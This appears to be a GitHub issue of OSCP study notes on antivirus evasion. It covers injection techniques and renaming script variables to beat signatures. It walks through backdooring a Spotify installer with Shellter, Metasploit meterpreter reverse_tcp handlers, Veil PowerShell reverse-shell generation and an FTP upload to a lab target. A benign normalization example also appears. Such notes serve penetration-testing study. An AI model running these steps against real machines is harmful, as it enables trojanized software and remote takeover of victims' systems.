Open WDavid404 opened 10 months ago
VirusTotal is a malware search engine that allows users to search known malware or submit new samples and scan them against a number of AV products.
AV signatures are written based on known threats.
To overcome these AV limitations, Endpoint Detection and Response (EDR) solutions have evolved during recent years. EDR software is responsible for generating security-event telemetry and forwarding it to a Security Information and Event Management (SIEM) system, which collects data from every company host. These events are then rendered by the SIEM so that the security analyst team can gain a full overview of any past or ongoing attack affecting the organization.
A modern antivirus is typically designed around the following components:
Enigma Protector
Portable executables (PE): PE stands for Portable Executable. It is the native executable file format of the Windows environment. Some of its characteristics are inherited from the Unix COFF (Common Object File Format) file format.
In-Memory Injection, also known as PE Injection.
One of the main benefits of this technique is that it does not write any files to disk, which is a commonly focused area for most antivirus products.
Remote Process Memory Injection, which attempts to inject the payload into another valid PE that is not malicious. The most common method of doing this is by leveraging a set of Windows APIs.
The Reflective DLL Injection technique attempts to load a DLL stored by the attacker in the process memory. The main challenge of implementing this technique is that LoadLibrary does not support loading a DLL from memory. Furthermore, the Windows operating system does not expose any APIs that can handle this either. Attackers who choose to use this technique must write their own version of the API that does not rely on a disk-based DLL.
Process Hollowing: attackers first launch a non-malicious process in a suspended state. Once launched, the image of the process is removed from memory and replaced with a malicious executable image. Finally, the process is then resumed and malicious code is executed instead of the legitimate process.
Inline hooking: involves modifying memory and introducing a hook (an instruction that redirects the code execution) into a function to make it point to our malicious code. Upon executing our malicious code, the flow will return back to the modified function and resume execution, appearing as if only the original code had executed.
One of the main benefits of executing a script rather than a PE is that it is difficult for antivirus manufacturers to determine if the script is malicious as it's run inside an interpreter and the script itself isn't executable code. Nevertheless, please keep in mind that some AV products handle malicious script detection with more success than others.
Furthermore, even if the script is marked as malicious, it can easily be altered. Antivirus software will often review variable names, comments, and logic, all of which can be changed without the need to recompile anything.
Avira Free Security is one of the best free antivirus offerings on the market, but it lacks a lot of features that Avira's paid plans include, like unlimited VPN data and password manager data protection tools. Avira Free users don't get access to email or phone customer support, either.
In the script, sc and winFunc were renamed to var1 and var2, respectively, to bypass AV detection.
Original content
After modification
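The note above illustrates why a signature that matches on literal variable names and comments breaks as soon as those are edited. The following Python is an added example, not part of this issue or of any AV product: it strips comments, canonicalizes PowerShell variable names in order of first appearance, and shows that a hash over the normalized token stream is identical for the original and the renamed variant, while a hash over the raw text is not. The two sample scripts are constructed and benign.

```python
import hashlib
import re

# Constructed, benign sample: the same tiny script before and after the kind of
# edit described above (variables sc/winFunc renamed, comment removed).
ORIGINAL = """# read the input file
$sc = Get-Content input.txt
$winFunc = $sc.Length
Write-Output $winFunc
"""

RENAMED = """$var1 = Get-Content input.txt
$var2 = $var1.Length
Write-Output $var2
"""

# Tokens: PowerShell variables ($name), bare words / cmdlets (Get-Content), or any other single char.
TOKEN_RE = re.compile(r"\$[A-Za-z_][A-Za-z0-9_]*|[A-Za-z_][A-Za-z0-9_-]*|\S")


def normalize(script: str) -> list:
    """Drop '#' comments and rename each variable to $v0, $v1, ... in order of first use.

    Assumption (for the demo): a '#' always starts a comment, i.e. none appear inside strings.
    """
    names = {}
    tokens = []
    for line in script.splitlines():
        code = line.split("#", 1)[0]
        for tok in TOKEN_RE.findall(code):
            if tok.startswith("$"):
                tok = names.setdefault(tok.lower(), f"$v{len(names)}")
            tokens.append(tok)
    return tokens


def naive_signature(script: str) -> str:
    """Hash of the raw text: changes with any rename or comment edit."""
    return hashlib.sha256(script.encode()).hexdigest()


def normalized_signature(script: str) -> str:
    """Hash of the normalized token stream: stable across renames and comment edits."""
    return hashlib.sha256(" ".join(normalize(script)).encode()).hexdigest()


if __name__ == "__main__":
    print("raw hashes match:       ", naive_signature(ORIGINAL) == naive_signature(RENAMED))
    print("normalized hashes match:", normalized_signature(ORIGINAL) == normalized_signature(RENAMED))
```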
To execute our script, we first need to change PowerShell's execution policy: retrieve the current execution policy via the Get-ExecutionPolicy -Scope CurrentUser command and then set it to Unrestricted via the Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser command.
PS C:\Users\offsec\Desktop> Get-ExecutionPolicy -Scope CurrentUser
Undefined
PS C:\Users\offsec\Desktop> Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser
Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help Module at
https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "N"): A
PS C:\Users\offsec\Desktop> Get-ExecutionPolicy -Scope CurrentUser
Unrestricted
Shellter is a dynamic shellcode injection tool and one of the most popular free tools capable of bypassing antivirus software. It uses a number of novel and advanced techniques to backdoor a valid and non-malicious executable file with a malicious shellcode payload.
Installation:
kali@kali:~$ apt-cache search shellter
shellter - Dynamic shellcode injection tool and dynamic PE infector
kali@kali:~$ sudo apt install shellter
...
Also install wine to run shellter on Linux:
kali@kali:~$ sudo apt install wine
...
root@kali:~# sudo dpkg --add-architecture i386 && sudo apt-get update &&
sudo apt-get install wine32
--> The dpkg command tells the package manager to add support for the 32-bit x86 architecture, which is required to install 32-bit applications; the second command installs the wine32 package.
Once everything is installed, run the shellter command in the local Kali terminal.
To start, we'll need to tell Shellter the Spotify installer location on our local Kali machine. In this case, it is /home/kali/desktop/spotifysetup.exe. Before analyzing and altering the original PE in any way, Shellter will first create a backup of the file.
Run the following command on Kali to receive the reverse shell that the Spotify.exe file above sends back when it runs:
kali@kali:~$ msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.50.1;set LPORT 443;run;"
When the injected Spotify.exe is run on the target Windows PC, Kali shows the following:
Note: if running the shellter command hits the following error:
└─$ shellter
wine: could not load kernel32.dll, status c0000135
run the following command, then run shellter again:
mv ~/.wine ~/.wine.old
A successful run looks like the picture below (even though an error message still appears).
Target IP: 192.168.186.53
nmap -sV -T4
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft IIS httpd 10.0
--> I cannot access the web page in a web browser
Try to log in to FTP as anonymous --> succeeded
FTP operations
ftp> prompt
Interactive mode off.
ftp> binary   -> enable binary mode while transferring the file
200 Type set to I.
ftp> put putty.exe
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
03-08-24 01:21AM putty.exe
226 Transfer complete.
Meanwhile, prepare the Metasploit multi/handler on Kali:
`msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <kali IP>;set LPORT 443;run;"`
Install Veil on Kali:
sudo apt install veil-evasion
sudo veil
Note: don't skip or cancel installation steps such as Python and Ruby.
Run Veil:
sudo veil
Veil > update --> update to the latest version to increase the probability of success
use 1 --> use Evasion mode (1)
list --> list all payloads
use 22 --> 22) powershell/meterpreter/rev_tcp.py
set lhost 192.168.45.203
set lport 443
options
generate
--> enter the filename 'test_veil'; it will generate a .bat file
![image](https://github.com/WDavid404/OSCP/assets/137129330/77dc0932-20d3-464b-a930-962919a6c6fd)
3. Set the FTP session as active:
ftp -A 192.168.193.53 .. (same as Q2)